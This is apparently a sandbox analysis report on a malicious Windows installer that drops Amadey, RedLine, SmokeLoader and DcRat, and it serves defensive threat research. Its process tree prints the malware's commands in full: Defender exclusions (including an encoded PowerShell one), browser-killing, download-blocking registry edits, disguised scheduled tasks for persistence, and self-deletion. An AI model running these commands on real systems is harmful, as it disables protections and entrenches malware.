Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-01-2023 15:25

General

  • Target

    Setup_soft.exe

  • Size

    7.6MB

  • MD5

    0a6c5a1589ce307de6910aa8ae5504ae

  • SHA1

    7e1168be4c273e7802eb560183c3dcae68d92356

  • SHA256

    d95d8f734f2459ca045b7ba1de3af1603a31b06c2dde127f837e383f4a1425fe

  • SHA512

    f73e70d37c8f884d1ac059663a23e3d9f492821d9922fd76fc87db37b49316d2759170d600cc26facc1a5fe511d8363c3bb90e648c8ae779ee0a7d87f8bdabf7

  • SSDEEP

    98304:Y5I5x3omArylYOI5CAaT+dPas2Yv0zcBWc1fldTRwaykXf1D:15xqyoaT+dPB2mwq7T5bXf

Malware Config

Extracted

Family

amadey

Version

3.65

C2

83.217.11.7/8vcWxwwx3/index.php

Extracted

Family

redline

C2

95.217.146.176:4283

Attributes
  • auth_value

    a909e2aaecf96137978fea4f86400b9b

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • DcRat 17 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detects Smokeloader packer 3 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 9 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 16 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 57 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup_soft.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup_soft.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3444
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe"
      2⤵
      • DcRat
      • Blocklisted process makes network request
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3540
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
        3⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:3656
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4A57.bat" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2824
    • C:\Windows\system32\cacls.exe
      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      2⤵
        PID:996
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command Add-MpPreference -ExclusionPath C:\
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3696
      • C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\Software\Policies\Google\chrome" /v DownloadRestrictions /t REG_DWORD /d 3
        2⤵
          PID:1824
        • C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Edge" /v DownloadRestrictions /t REG_DWORD /d 3
          2⤵
            PID:3348
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM chrome.exe
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3432
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM msedge.exe
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2716
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM opera.exe
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3148
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM brave.exe
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3556
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM firefox.exe
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3160
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM Telegram.exe
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3544
        • C:\Users\Admin\AppData\Local\Temp\4CD9.exe
          C:\Users\Admin\AppData\Local\Temp\4CD9.exe
          1⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4636
          • C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
            "C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe"
            2⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:3364
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe" /F
              3⤵
              • DcRat
              • Creates scheduled task(s)
              PID:2452
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\8682d6c68d" /P "Admin:N"&&CACLS "..\8682d6c68d" /P "Admin:R" /E&&Exit
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4332
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                4⤵
                  PID:396
                • C:\Windows\SysWOW64\cacls.exe
                  CACLS "nbveek.exe" /P "Admin:N"
                  4⤵
                    PID:2440
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "nbveek.exe" /P "Admin:R" /E
                    4⤵
                      PID:3012
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      4⤵
                        PID:1000
                      • C:\Windows\SysWOW64\cacls.exe
                        CACLS "..\8682d6c68d" /P "Admin:N"
                        4⤵
                          PID:4756
                        • C:\Windows\SysWOW64\cacls.exe
                          CACLS "..\8682d6c68d" /P "Admin:R" /E
                          4⤵
                            PID:3736
                        • C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
                          "C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe"
                          3⤵
                            PID:3720
                          • C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
                            "C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe"
                            3⤵
                              PID:924
                            • C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
                              "C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe"
                              3⤵
                                PID:4480
                              • C:\Users\Admin\AppData\Local\Temp\1000055001\DefendUpdate.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000055001\DefendUpdate.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:4836
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\1000055001\DefendUpdate.exe
                                  4⤵
                                    PID:4216
                                    • C:\Windows\system32\choice.exe
                                      choice /C Y /N /D Y /T 0
                                      5⤵
                                        PID:2072
                                  • C:\Users\Admin\AppData\Local\Temp\1000056001\MicrosoftFIX_error.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000056001\MicrosoftFIX_error.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:1148
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\8be7d7b3521979\cred64.dll, Main
                                    3⤵
                                    • Loads dropped DLL
                                    PID:3944
                                    • C:\Windows\system32\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\8be7d7b3521979\cred64.dll, Main
                                      4⤵
                                      • Loads dropped DLL
                                      PID:2092
                                      • C:\Windows\system32\WerFault.exe
                                        C:\Windows\system32\WerFault.exe -u -p 2092 -s 680
                                        5⤵
                                        • Program crash
                                        PID:2820
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\8be7d7b3521979\clip64.dll, Main
                                    3⤵
                                    • Loads dropped DLL
                                    PID:4884
                              • C:\Users\Admin\AppData\Local\Temp\52B6.exe
                                C:\Users\Admin\AppData\Local\Temp\52B6.exe
                                1⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of SetThreadContext
                                PID:2888
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                  2⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1776
                              • C:\Users\Admin\AppData\Local\Temp\55B4.exe
                                C:\Users\Admin\AppData\Local\Temp\55B4.exe
                                1⤵
                                • Executes dropped EXE
                                PID:4156
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\55B4.exe
                                  2⤵
                                    PID:2140
                                    • C:\Windows\system32\choice.exe
                                      choice /C Y /N /D Y /T 0
                                      3⤵
                                        PID:2496
                                  • C:\Users\Admin\AppData\Local\Temp\5AC6.exe
                                    C:\Users\Admin\AppData\Local\Temp\5AC6.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    PID:204
                                    • C:\Users\Admin\AppData\Local\Temp\ProgramStarter.exe
                                      "C:\Users\Admin\AppData\Local\Temp\ProgramStarter.exe"
                                      2⤵
                                      • Drops file in Drivers directory
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3600
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "cmd.exe" /C powershell -EncodedCommand "PAAjAG0AcwBCAFoAcABHAHAASABFAEQAdwBFAFkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBUAHoARABIAGkARwBqAFIAVAB3AHcAcwBiAHMAawAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAeQBiAEsATQBuAEsAdwBkAEUAQgByAEQAcQBUAG8ASQBqAGMAIwA+ACAAQAAoACAAPAAjAGsAbABUAHEAVQBiAGcAaQBwAEcARQBCACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBLAFkAZAB4AEEATABMAFcAagB3AG8ATAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAQQBRAFYAZABCAGcATgBkAFUAbQBCAGwAcQBDAGgAWABLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEcAeQB5AEcATABLAGcAQgBqAHIAeABzAFgAZQBXAGwAVAB1ACMAPgA="
                                        3⤵
                                          PID:4668
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -EncodedCommand "PAAjAG0AcwBCAFoAcABHAHAASABFAEQAdwBFAFkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBUAHoARABIAGkARwBqAFIAVAB3AHcAcwBiAHMAawAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAeQBiAEsATQBuAEsAdwBkAEUAQgByAEQAcQBUAG8ASQBqAGMAIwA+ACAAQAAoACAAPAAjAGsAbABUAHEAVQBiAGcAaQBwAEcARQBCACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBLAFkAZAB4AEEATABMAFcAagB3AG8ATAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAQQBRAFYAZABCAGcATgBkAFUAbQBCAGwAcQBDAGgAWABLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEcAeQB5AEcATABLAGcAQgBqAHIAeABzAFgAZQBXAGwAVAB1ACMAPgA="
                                            4⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1468
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                          3⤵
                                            PID:4092
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                              4⤵
                                              • DcRat
                                              • Creates scheduled task(s)
                                              PID:2092
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                            3⤵
                                              PID:2060
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                4⤵
                                                • DcRat
                                                • Creates scheduled task(s)
                                                PID:2496
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                              3⤵
                                                PID:3348
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                  4⤵
                                                  • DcRat
                                                  • Creates scheduled task(s)
                                                  PID:2012
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                3⤵
                                                  PID:396
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                    4⤵
                                                    • DcRat
                                                    • Creates scheduled task(s)
                                                    PID:2140
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                  3⤵
                                                    PID:1296
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                      4⤵
                                                      • DcRat
                                                      • Creates scheduled task(s)
                                                      PID:3016
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                    3⤵
                                                      PID:2448
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                        4⤵
                                                        • DcRat
                                                        • Creates scheduled task(s)
                                                        PID:2232
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                      3⤵
                                                        PID:3432
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                          4⤵
                                                          • DcRat
                                                          • Creates scheduled task(s)
                                                          PID:4956
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                        3⤵
                                                          PID:364
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                            4⤵
                                                            • DcRat
                                                            • Creates scheduled task(s)
                                                            PID:4012
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk744" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                          3⤵
                                                            PID:3736
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk744" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                              4⤵
                                                              • DcRat
                                                              • Creates scheduled task(s)
                                                              PID:4828
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk925" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                            3⤵
                                                              PID:4464
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk925" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                4⤵
                                                                • DcRat
                                                                • Creates scheduled task(s)
                                                                PID:3272
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk610" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                              3⤵
                                                                PID:3556
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk610" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                  4⤵
                                                                  • DcRat
                                                                  • Creates scheduled task(s)
                                                                  PID:2608
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk60" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                3⤵
                                                                  PID:4460
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk60" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                    4⤵
                                                                    • DcRat
                                                                    • Creates scheduled task(s)
                                                                    PID:4996
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                  3⤵
                                                                    PID:1556
                                                                    • C:\Windows\SysWOW64\powercfg.exe
                                                                      powercfg /x -hibernate-timeout-ac 0
                                                                      4⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:5052
                                                                    • C:\Windows\SysWOW64\powercfg.exe
                                                                      powercfg /x -hibernate-timeout-dc 0
                                                                      4⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2644
                                                                    • C:\Windows\SysWOW64\powercfg.exe
                                                                      powercfg /x -standby-timeout-ac 0
                                                                      4⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4380
                                                                    • C:\Windows\SysWOW64\powercfg.exe
                                                                      powercfg /x -standby-timeout-dc 0
                                                                      4⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4412
                                                                    • C:\Windows\SysWOW64\powercfg.exe
                                                                      powercfg /hibernate off
                                                                      4⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4100
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                      4⤵
                                                                      • DcRat
                                                                      • Creates scheduled task(s)
                                                                      PID:4260
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
                                                                    3⤵
                                                                      PID:2312
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
                                                                        4⤵
                                                                        • DcRat
                                                                        • Creates scheduled task(s)
                                                                        PID:3952
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk484" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                      3⤵
                                                                        PID:2884
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk484" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                          4⤵
                                                                          • DcRat
                                                                          • Creates scheduled task(s)
                                                                          PID:3604
                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                    1⤵
                                                                      PID:5016
                                                                    • C:\Windows\explorer.exe
                                                                      C:\Windows\explorer.exe
                                                                      1⤵
                                                                        PID:2396
                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                        1⤵
                                                                          PID:4992
                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                          1⤵
                                                                            PID:1288
                                                                          • C:\Windows\explorer.exe
                                                                            C:\Windows\explorer.exe
                                                                            1⤵
                                                                              PID:5088
                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                              1⤵
                                                                                PID:424
                                                                              • C:\Windows\system32\WerFault.exe
                                                                                C:\Windows\system32\WerFault.exe -pss -s 360 -p 2092 -ip 2092
                                                                                1⤵
                                                                                  PID:1028
                                                                                • C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2440

                                                                                Network

                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                Execution

                                                                                Scheduled Task

                                                                                1
                                                                                T1053

                                                                                Persistence

                                                                                Scheduled Task

                                                                                1
                                                                                T1053

                                                                                Privilege Escalation

                                                                                Scheduled Task

                                                                                1
                                                                                T1053

                                                                                Defense Evasion

                                                                                Virtualization/Sandbox Evasion

                                                                                1
                                                                                T1497

                                                                                Credential Access

                                                                                Credentials in Files

                                                                                2
                                                                                T1081

                                                                                Discovery

                                                                                Query Registry

                                                                                4
                                                                                T1012

                                                                                Virtualization/Sandbox Evasion

                                                                                1
                                                                                T1497

                                                                                System Information Discovery

                                                                                5
                                                                                T1082

                                                                                Peripheral Device Discovery

                                                                                1
                                                                                T1120

                                                                                Collection

                                                                                Data from Local System

                                                                                2
                                                                                T1005

                                                                                Command and Control

                                                                                Web Service

                                                                                1
                                                                                T1102

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  814947989ba650b60f865ed993f70214

                                                                                  SHA1

                                                                                  86be855bd98709bcb9b002de6f44afe14beb83ff

                                                                                  SHA256

                                                                                  f367cdeda228c76b9184d0a11d5697c9f0daf0bbeccf45dba77b1327da7aeed6

                                                                                  SHA512

                                                                                  312f4f57a91f8f29daf9756af729dc8cd1cd789a22c34b67baad1e503a7e77b3492d87ce05eff1922e8745eeedbb2ef263f05d8433d781929b3b5226433c6113

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                  Filesize

                                                                                  53KB

                                                                                  MD5

                                                                                  3337d66209faa998d52d781d0ff2d804

                                                                                  SHA1

                                                                                  6594b85a70f998f79f43cdf1ca56137997534156

                                                                                  SHA256

                                                                                  9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd

                                                                                  SHA512

                                                                                  8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                  Filesize

                                                                                  944B

                                                                                  MD5

                                                                                  e243a38635ff9a06c87c2a61a2200656

                                                                                  SHA1

                                                                                  ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

                                                                                  SHA256

                                                                                  af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

                                                                                  SHA512

                                                                                  4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

                                                                                • C:\Users\Admin\AppData\Local\Temp\1000055001\DefendUpdate.exe
                                                                                  Filesize

                                                                                  2.4MB

                                                                                  MD5

                                                                                  14240c1ce12a65b513ccce856a8630d3

                                                                                  SHA1

                                                                                  b7a8d16898fa8508fa4547dbef4bac6496bc0968

                                                                                  SHA256

                                                                                  bacb80c9478755982aac032418b203382f7e6159977d4498767670517ef29808

                                                                                  SHA512

                                                                                  8d03eaaf1cb53ecec46577f543b9902aafd6d0888084d90745a6816d23dc3c8d0148b004c1ae889af384eeb58fa1868b811d4a1d24d4265a8f8f2a93bbf94a7a

                                                                                • C:\Users\Admin\AppData\Local\Temp\1000055001\DefendUpdate.exe
                                                                                  Filesize

                                                                                  2.4MB

                                                                                  MD5

                                                                                  14240c1ce12a65b513ccce856a8630d3

                                                                                  SHA1

